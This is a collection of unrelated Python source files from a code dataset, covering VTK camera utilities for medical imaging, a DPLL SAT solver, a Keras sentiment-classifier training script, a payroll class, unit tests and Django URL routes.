ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 1\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 1, max_extent * 6)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not Useful ? In VKT, the AspectRation is Calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_default_vr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL: render_common.PositionType.TRANSVERSAL:\n :param camera: camera is the output result\n :param same_aspect_ratio: when TRA(横), COR(冠), SAG(矢), should be in the same scale, then the flag should be true\n :return:\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 3\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 2.5, max_extent * 3.5)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not Useful ? In VKT, the AspectRation is Calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_slice_axis_matrix(camera):\n \"\"\"\n The function usually used to set matrix of MPR\n :param camera:\n :return:\n \"\"\"\n # Step1: calculate z_dir\n camera_pos = camera.GetPosition()\n camera_focal = camera.GetFocalPoint()\n z_dir = [camera_pos[0] - camera_focal[0], camera_pos[1] - camera_focal[1], camera_pos[2] - camera_focal[2]]\n z_dir_norm = np.linalg.norm(z_dir, ord=2)\n z_dir_normalized = z_dir / z_dir_norm\n render_common.logging.info(\"z_dir_normalized\" + str(z_dir_normalized[0])\n + str(z_dir_normalized[1]) + str(z_dir_normalized[2]))\n # Step2: Calculate y_dir\n camera_view_up = camera.GetViewUp()\n camera_view_up = camera_view_up / np.linalg.norm(camera_view_up)\n\n # Step3: Calculate x_dir\n x_dir_normal = np.cross(camera_view_up, z_dir_normalized)\n\n # Step4: Get SliceAxis Matrix of MPR\n return ((x_dir_normal[0], camera_view_up[0], z_dir_normalized[0], camera_focal[0],\n x_dir_normal[1], camera_view_up[1], z_dir_normalized[1], camera_focal[1],\n x_dir_normal[2], camera_view_up[2], z_dir_normalized[2], camera_focal[2],\n 0, 0, 0, 1))\n\n\ndef np_2_vtkMatrix(mat):\n if mat.shape == (4, 4):\n obj = vtk.vtkMatrix4x4()\n for i in range(4):\n for j in range(4):\n obj.SetElement(i, j, mat[i, j])\n return obj\n\n\ndef vtkMatrix_to_np(vtk_mat):\n if isinstance(vtk_mat, vtk.vtkMatrix4x4):\n np_mat = np.matrix(np.arange(16).reshape(4, 4), dtype=float)\n if np_mat.shape == (4, 4):\n for i in range(4):\n for j in range(4):\n np_mat[i, j] = vtk_mat.GetElement(i, j)\n return np_mat\n\n\ndef get_view_matrix(camera):\n return vtkMatrix_to_np(camera.GetViewTransformMatrix)\n\n\ndef get_projection_matrix(scene):\n camera = scene.get_camera()\n projection_matrix = camera.GetProjectionTransformMatrix(scene.get_render())\n return vtkMatrix_to_np(projection_matrix)\n\n\ndef tranform_world_to_screen_vtk_inner(vtk_view_port, vtk_camera, point3dworld):\n # World2View Tranform\n cur_camera = vtk_camera\n vtk_view_port.ComputeAspect()\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n point3dworld[3] = 1.0\n x0 = mat_vp.GetElement(0, 0)*point3dworld[0] + mat_vp.GetElement(0, 1)*point3dworld[1] \\\n + mat_vp.GetElement(0, 2)*point3dworld[2] + mat_vp.GetElement(0, 3)*point3dworld[3]\n x1 = mat_vp.GetElement(1, 0) * point3dworld[0] + mat_vp.GetElement(1, 1) * point3dworld[1] \\\n + mat_vp.GetElement(1, 2) * point3dworld[2] + mat_vp.GetElement(1, 3) * point3dworld[3]\n x2 = mat_vp.GetElement(2, 0) * point3dworld[0] + mat_vp.GetElement(2, 1) * point3dworld[1] \\\n + mat_vp.GetElement(2, 2) * point3dworld[2] + mat_vp.GetElement(2, 3) * point3dworld[3]\n x3 = mat_vp.GetElement(3, 0) * point3dworld[0] + mat_vp.GetElement(3, 1) * point3dworld[1] \\\n + mat_vp.GetElement(3, 2) * point3dworld[2] + mat_vp.GetElement(3, 3) * point3dworld[3]\n\n point4d_view = [x0, x1, x2, x3]\n if point4d_view[3] != 0:\n point4d_view = [point4d_view[0] / point4d_view[3], point4d_view[1] / point4d_view[3],\n point4d_view[2] / point4d_view[3], point4d_view[3] / point4d_view[3]]\n\n vtk_view_port.SetViewPoint([point4d_view[0], point4d_view[1], point4d_view[2]])\n vtk_view_port.ViewToDisplay()\n point3d_screen = vtk_view_port.GetDisplayPoint()\n return point3d_screen\n\n\ndef transform_world_to_screen_vtk(scene, point3dworld):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return tranform_world_to_screen_vtk_inner(cur_renderer, cur_camera, point3dworld)\n\n\ndef transform_screen_to_world_vtk_inner(vtk_view_port, vtk_camera, point3dscreen):\n # Screen2View Transform\n vtk_view_port.SetDisplayPoint(point3dscreen)\n vtk_view_port.DisplayToView()\n point3dscreen = vtk_view_port.GetViewPoint() # Range in [-1, 1]\n\n # View2World Transform\n cur_camera = vtk_camera\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n mat_vp_invert = vtk.vtkMatrix4x4()\n vtkMatrix4x4.Invert(mat_vp, mat_vp_invert)\n point4dscreen = [point3dscreen[0], point3dscreen[1], point3dscreen[2], 1.0]\n x0 = mat_vp_invert.GetElement(0, 0)*point4dscreen[0] + mat_vp_invert.GetElement(0, 1)*point4dscreen[1] \\\n + mat_vp_invert.GetElement(0, 2)*point4dscreen[2] + mat_vp_invert.GetElement(0, 3)*point4dscreen[3]\n x1 = mat_vp_invert.GetElement(1, 0) * point4dscreen[0] + mat_vp_invert.GetElement(1, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(1, 2) * point4dscreen[2] + mat_vp_invert.GetElement(1, 3) * point4dscreen[3]\n x2 = mat_vp_invert.GetElement(2, 0) * point4dscreen[0] + mat_vp_invert.GetElement(2, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(2, 2) * point4dscreen[2] + mat_vp_invert.GetElement(2, 3) * point4dscreen[3]\n x3 = mat_vp_invert.GetElement(3, 0) * point4dscreen[0] + mat_vp_invert.GetElement(3, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(3, 2) * point4dscreen[2] + mat_vp_invert.GetElement(3, 3) * point4dscreen[3]\n\n point4d_world = [x0, x1, x2, x3]\n if point4d_world[3] != 0:\n point4d_world = [point4d_world[0] / point4d_world[3], point4d_world[1] / point4d_world[3],\n point4d_world[2] / point4d_world[3], point4d_world[3] / point4d_world[3]]\n return [point4d_world[0], point4d_world[1], point4d_world[2]]\n\n\ndef transform_screen_to_world_vtk(scene, point3dscreen):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return transform_screen_to_world_vtk_inner(cur_renderer, cur_camera, point3dscreen)\n\n\ndef transform_screen_to_world_zwh(scene, point2d):\n cur_renderer = scene.get_render()\n picker = vtkWorldPointPicker()\n picker.Pick(point2d[0], point2d[1], 0, cur_renderer)\n last_point = picker.GetPickPosition()\n return last_point\n\n\ndef transform_screen_to_world(scene, point2d):\n \"\"\"\n tranform screen to world\n :param Renderer:\n :param point2d:\n :return:\n \"\"\"\n point3d_screen = [point2d[0], point2d[1], 0.0]\n return transform_screen_to_world_vtk(scene, point3d_screen)\n\n\ndef transform_world_to_screen(scene, point3d_world):\n \"\"\"\n tranform screen to world\n :param Renderer:\n :param point2d:\n :return:\n \"\"\"\n screen3d = transform_world_to_screen_vtk(scene, [point3d_world[0], point3d_world[1], point3d_world[2], 1.0])\n return [screen3d[0], screen3d[1]]\n\n","sub_path":"visualization/camera_utility.py","file_name":"camera_utility.py","file_ext":"py","file_size_in_byte":25907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"438130645","text":"class Point:\n def __init__(self,x,y,color=\"\"):\n self.x =x\n self.y=y\n self.color=color\n\nclass Circle:\n def __init__(self, center, radius, color=''):\n self.center=center\n self.radius=checkValue(radius,\"radius\")\n self.color=color\n\nclass Rect:\n def __init__(self, center, width, height, color=''):\n self.center = center\n self.width = checkValue(width,\"width\")\n self.height =checkValue(height,\"height\")\n self.color=color\n\nclass Polygon:\n def __init__ (self, points, color=''):\n self.points=points\n self.color = color\n\ndef checkValue(val, attribute):\n if val>0:\n return val\n else:\n print(\"Error: \"+attribute +\" cannot be less than 0\")\n exit(1)\n","sub_path":"src/model/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"387161054","text":"from copy import deepcopy\n# import pdb\n\n\ndef has_singleatom(A):\n for sublist in A:\n if len(sublist) == 1:\n return True\n return False\n\n\ndef has_empty(A):\n for sublist in A:\n if len(sublist) == 0:\n return True\n return False\n\n\ndef complement(atom):\n if atom[0] == '-':\n return atom[1]\n else:\n return '-' + atom\n\n\ndef is_negation(atom):\n if atom[0] == '-':\n return True\n else:\n return False\n\n\ndef unitPropagate(A, partial):\n # pdb.set_trace()\n while has_singleatom(A):\n for sublist in A:\n if len(sublist) == 1:\n pureatom = sublist[0]\n suppose(pureatom, A, partial)\n\n\ndef find_unassigned(wholelist, I):\n for sublist in wholelist:\n for atom in sublist:\n if is_negation(atom):\n check = complement(atom)\n else:\n check = atom\n if I.get(check, -1) == -1:\n return check\n\n\ndef suppose(pureatom, A, I):\n if (is_negation(pureatom)):\n assert I.get(complement(pureatom), -1) == -1, 'Acceding defined letter'\n I[complement(pureatom)] = 0\n else:\n assert I.get(pureatom, -1) == -1, 'Acceding defined letter'\n I[pureatom] = 1\n\n pureatom_complement = complement(pureatom)\n i = 0\n while i != len(A):\n sublist = A[i]\n if pureatom in sublist:\n A.pop(i)\n i = 0\n continue\n elif pureatom_complement in sublist:\n sublist.remove(pureatom_complement)\n i += 1\n\n\ndef DPLL(S, I):\n unitPropagate(S, I)\n if has_empty(S):\n return 'Insatisfacible', {}\n if len(S) == 0:\n return 'Satisfacible', I\n\n l = find_unassigned(S, I)\n S_prime = deepcopy(S)\n I_prime = deepcopy(I)\n suppose(l, S_prime, I_prime)\n maybe, S_prime_prime = DPLL(S_prime, I_prime)\n if maybe == 'Satisfacible':\n return 'Satisfacible', S_prime_prime\n else:\n S_prime2 = deepcopy(S)\n I_prime2 = deepcopy(I)\n suppose(complement(l), S_prime2, I_prime2)\n return DPLL(S_prime2, I_prime2)\n","sub_path":"DPLL.py","file_name":"DPLL.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"595263623","text":"# 有参无参,返回值\ndef show(name, age):\n print(\"My name is %s, I am %d years old\" % (name, age))\n\n\nshow(\"chen\", 28)\n\n\ndef return_value(name):\n return \"hello \" + name\n\n\nres = return_value(\"chen\")\nprint(res)\n\n\n# 缺省函数, 函数定义的时候参数就有值\ndef sum_name(a=1, b=2):\n return a + b\n\n\nprint(sum_name())\nprint(sum_name(3, 5))\nprint(sum_name(b=3, a=4)) # 关键字传参,不用注意顺序\n\n\n# 不定长参数, 是传入一个tuple, 不能使用关键字来指定\ndef sum_num(*args):\n print(args, type(args))\n\n r = 0\n for i in args:\n r += i\n return r\n\n\nrr = sum_num(1, 2, 3)\nprint(rr)\n\n\n# 不定长参数,传入一个dict, 必须使用关键字传参,指定kv\ndef sum_dict(**kwargs):\n print(kwargs, type(kwargs))\n\n for key, value in kwargs.items():\n print(key, value)\n\n\nsum_dict(a=1, b=2, c=3, name=\"tom\")","sub_path":"python_basic/day03/01-函数定义.py","file_name":"01-函数定义.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"41655513","text":"\"\"\"\ncs1114\n\nSubmission: rec08\n\nProgrammer: Yogesh Dhamija\nUsername: yad220\n\nThis module contains the Company type. \n\"\"\"\n\nfrom hw10_worker import *\n\nCOMPANY_DUPLICATE_WORKER_ERROR = 10001\nCOMPANY_NEGATIVE_HOURS_ERROR = 12345\nCOMPANY_TOO_LOW_WAGE_ERROR = 76547\nCOMPANY_TOO_HIGH_WAGE_ERROR = 67583\n\nCOMPANY_SUCCESS_CODE = 11111\n\nclass Company(object):\n\t\n\tdef __init__(self, name):\n\t\tself.__name = name\n\t\tself.__workers = {}\n\t\n\tdef addWorker(self, ssn, name):\n\t\t\"\"\" \"\"\"\n\t\tnewWorker = WorkerRec(ssn, name)\n\t\tif newWorker in self.__workers.keys():\n\t\t\treturn COMPANY_DUPLICATE_WORKER_ERROR\n\t\telse:\n\t\t\tself.__workers[newWorker.getSSN()] = newWorker\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef addWorkerHours(self, ssn, hours):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].addHours(hours)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_NEGATIVE_HOURS_ERROR):\n\t\t\treturn COMPANY_NEGATIVE_HOURS_ERROR\n\t\n\tdef changeWorkerRate(self, ssn, rate):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].setRate(rate)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_TOO_LOW_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_LOW_WAGE_ERROR\n\t\telif(code == WORKER_TOO_HIGH_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_HIGH_WAGE_ERROR\n\t\n\tdef changeWorkerTitle(self, ssn, title):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].setTitle(title)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef payAllWorkers(self):\n\t\t\"\"\" \"\"\"\n\t\tpayList = self.__payWorkersReturnList()\n\t\tpayList.sort()\n\t\twriteString = \"\"\n\t\tfor item in payList:\n\t\t\ttitleString = ' [%s]' % (item[3]) if item[3] != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(item[0], item[1], item[2], titleString)\n\t\tfilePath = \"%s.pay\" % (self.__name.strip())\n\t\thandle = open(filePath, 'w')\n\t\thandle.write(writeString)\n\t\thandle.close()\n\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef __payWorkersReturnList(self):\n\t\t\"\"\" \"\"\"\n\t\tpayList = []\n\t\t# Structure of payList is [ [owed, SSN, name, title], [owed, SSN, name, title], ... ]\n\t\tfor item in self.__workers.values():\n\t\t\tcode = item.payWorker()\n\t\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\t\tpayList.append( [ item.getPay(), item.getSSN(), item.getName(), item.getTitle() ] )\n\t\treturn payList\n\t\n\tdef __makePrettyFormat(self, owed, ssn, name, title):\n\t\t\"\"\" \"\"\"\n\t\treturn (\"%i\\n%s $%0.2f%s\\n\") % (ssn, name, owed, title)\n\t\n\tdef fireWorker(self, ssn):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].payWorker()\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\tfilePath = \"%s.FINAL.pay\" % (self.__workers[ssn].getName())\n\t\t\twriteString = \"\"\n\t\t\ttitleString = ' [%s]' % (self.__workers[ssn].getTitle()) if self.__workers[ssn].getTitle() != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(self.__workers[ssn].getPay(), ssn, self.__workers[ssn].getName(), titleString)\n\t\t\thandle = open(filePath, 'w')\n\t\t\thandle.write(writeString)\n\t\t\thandle.close()\n\t\t\tdel(self.__workers[ssn])\n\t\t\treturn COMPANY_SUCCESS_CODE\n","sub_path":"Homework/hw10/hw10_company.py","file_name":"hw10_company.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"612667101","text":"# python3\n# coding=\n\nfrom collections import Iterable\nimport warnings\nfrom time import sleep\nfrom tqdm import tqdm\nfrom .result import Result\nfrom .corpora import *\n\n\nfunctions = {\n 'rus': rus_corpus,\n 'bam': bam_corpus,\n 'emk': emk_corpus,\n 'zho': zho_corpus,\n 'rus_parallel': rus_parallel_corpus,\n 'dan': dan_corpus,\n 'est': est_corpus,\n 'kat': kat_corpus\n }\n\n\nclass Corpus:\n def __init__(self, language, sleep_time=1, sleep_each=5):\n \"\"\"\n language: str: language alias\n sleep_time: int: sleeping time in seconds\n sleep_each: int: sleep after each `sleep_each` request\n \"\"\"\n \n self.language = language\n self.__corpus = functions[self.language] \n self.doc = self.__corpus.__doc__\n \n self.results = list()\n self.failed = list()\n self.__retry_flag = False\n \n self.__warn = 'Nothing found for query \"%s\".\\n' \\\n 'Call `retry_failed` method to retry failed queries'\n self.__pbar_desc = '\"%s\"'\n self.__type_except = 'Argument `query` must be of type or iterable, got <%s>'\n\n if sleep_each < 1:\n raise ValueError('Argument `sleep_each` must be >= 1')\n \n self.sleep_each = sleep_each\n self.sleep_time = sleep_time\n\n def search(self, query, *args, **kwargs):\n \"\"\"\n query: str: query\n for arguments see `params_container.Container`\n \"\"\"\n \n if isinstance(query, str):\n query = [query]\n \n if not isinstance(query, Iterable):\n raise TypeError(self.__type_except % type(query))\n \n if args:\n progress_total = args[0]\n elif 'numResults' in kwargs:\n progress_total = kwargs['numResults']\n else:\n progress_total = 100\n \n _results = list()\n \n for q in query:\n self.parser = self.__corpus.PageParser(q, *args, **kwargs)\n _r = Result(self.language, self.parser.__dict__)\n q_desc = self.__pbar_desc % q\n \n for t in tqdm(self.parser.extract(),\n total=progress_total,\n unit='docs',\n desc=q_desc):\n _r.add(t)\n if _r.N % self.sleep_each == 0:\n sleep(self.sleep_time)\n \n _results.append(_r)\n if _r.N < 1:\n warnings.warn(self.__warn % q)\n if not self.__retry_flag:\n self.failed.append(_r)\n \n if not self.__retry_flag:\n self.results.extend(_results)\n \n return _results\n\n def retry_failed(self):\n \"\"\"\n Calls `.search()` for failed queries stored in `.failed`\n \n ISSUE:\n if `_r` got successfully retrieved here,\n its empty `Result` is still left in `Corpus.results` \n \"\"\"\n if self.failed:\n self.__retry_flag = True\n _pos = list()\n _neg = list()\n \n for r in self.failed:\n _r = self.search(r.query, **r.params)[0]\n if _r.N > 0:\n _pos.append(_r)\n else:\n _neg.append(_r)\n \n self.failed = _neg[:]\n self.results.extend(_pos)\n self.__retry_flag = False\n \n return _pos\n \n else:\n return []\n","sub_path":"lingcorpora/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"450282899","text":"import argparse\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nimport data_helper\nfrom random import shuffle\n\nfrom keras import backend as K\nfrom keras import models\nfrom keras import layers\nfrom keras import optimizers\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n args.add_argument('--strmaxlen', type=int, default=150)\n args.add_argument('--epochs', type=int, default=100)\n args.add_argument('--batch', type=int, default=10)\n args.add_argument('--embedding', type=int, default=256)\n args.add_argument('--featuresize', type=int, default=129) # ascii code 기준 0~127 + 1\n config = args.parse_args()\n\n inputs = layers.Input((config.strmaxlen,)) \n layer = layers.Embedding(config.featuresize, config.embedding, input_length=config.strmaxlen, mask_zero = True)(inputs)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=True))(layer)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=False))(layer)\n\n layer_dense = layers.Dense(3)(layer)\n outputs_softmax = layers.Activation('softmax')(layer_dense)\n\n model = models.Model(inputs=inputs, outputs=outputs_softmax)\n model.summary()\n model.compile(optimizer=optimizers.Adam(lr=0.001,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n \n file_train_instances = \"sample50.csv\" #데이터셋 파일 이름\n \n # Load data\n print(\"Loading data...\") \n sentences, sentimentlabels = data_helper.load_data_and_labels(file_train_instances,config.strmaxlen)\n \n dataset_len = len(sentences)\n one_batch_size = dataset_len//config.batch\n if dataset_len % config.batch != 0:\n one_batch_size += 1\n \n sentiment_dataset = list(zip(sentences,sentimentlabels))\n print(sentiment_dataset)\n \n # epoch마다 학습을 수행합니다.\n for epoch in range(config.epochs):\n avg_loss = 0.0\n avg_acc = 0.0\n \n shuffle(sentiment_dataset)\n for batch in enumerate(data_helper._batch_loader(sentiment_dataset, config.batch)):\n i = batch[0] # enumerate - index\n data, labels = zip(*batch[1]) #batch[1] = (data,labels) -> 이걸 data, labels로 분리한다.\n data = np.array(data) # numpy array화\n labels = np.array(labels) # numpy array화\n loss, acc = model.train_on_batch(data, labels)\n print('Batch : ', i + 1, '/', one_batch_size,\n ', loss in this minibatch: ', float(loss),\n ', acc in this minibatch: ', float(acc))\n avg_loss += float(loss)\n avg_acc += float(acc)\n \n print('epoch:', epoch, ' train_loss:', float(avg_loss/one_batch_size), ' train_acc:', float(avg_acc/one_batch_size)) \n filename = str(\"model-epoch \"+ str(epoch))\n model.save(filename)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"242057634","text":"import item\nimport date\nimport unittest\n\n#class TestSequenceFunctions(unittest.TestCase):\n\n#def setUp():\n\ndef test_chocoladeshot(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchocoshot = item.Chocoladeshot(today,tempdate,1)\n\t\tself.assertEqual(chocoshot.getColor(),\"wit\")\n\t\tchocoshot.setColor(2)\n\t\tself.assertEqual(chocoshot.getColor(),\"bruin\")\n\t\tself.assertEqual(chocoshot.getPrice(),1)\n\ndef test_honing(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\thoning = item.Honing(today,tempdate)\n\t\tself.assertEqual(honing.getPrice(),0.50)\n\ndef test_Marshmallow(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tmarshmallow = item.Marshmallow(today,tempdate)\n\t\tself.assertEqual(marshmallow.getPrice(),0.75)\n\ndef test_Chilipeper(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchilipeper = item.Chilipeper(today,tempdate)\n\t\tself.assertEqual(chilipeper.getPrice(),0.25)\n\n\t\ndef test(self):\t\n\tprint()\n\tprint(\"starting testing testItem\")\n\ttest_chocoladeshot(self)\n\ttest_honing(self)\n\ttest_Marshmallow(self)\n\ttest_Chilipeper(self)\n\tprint(\"finished testing testItem\")\n\t\n \n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Project/testItem.py","file_name":"testItem.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"361753016","text":"# _*_ coding:utf-8 _*_\n_author_ = 'jackson'\n_date_ = '2019/4/7 16:50'\n\n\nfrom django.conf.urls import url,include\nfrom .views import MoocsListView,MoocDetailView,AddFavView\n\nurlpatterns = [\n #慕课小组列表页\n url(r'^list/$', MoocsListView.as_view(), name=\"mooc_list\"),\n\n #慕课小组详情页\n url(r'^detail/(?P\\d+)/$', MoocDetailView.as_view(), name=\"mooc_detail\"),\n # url(r'^detail/$', MoocDetailView.as_view(), name=\"moocs_detail\"),\n\n #慕课收藏\n url(r'^add_fav/$',AddFavView.as_view(),name=\"add_fav\")\n\n]","sub_path":"apps/moocs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
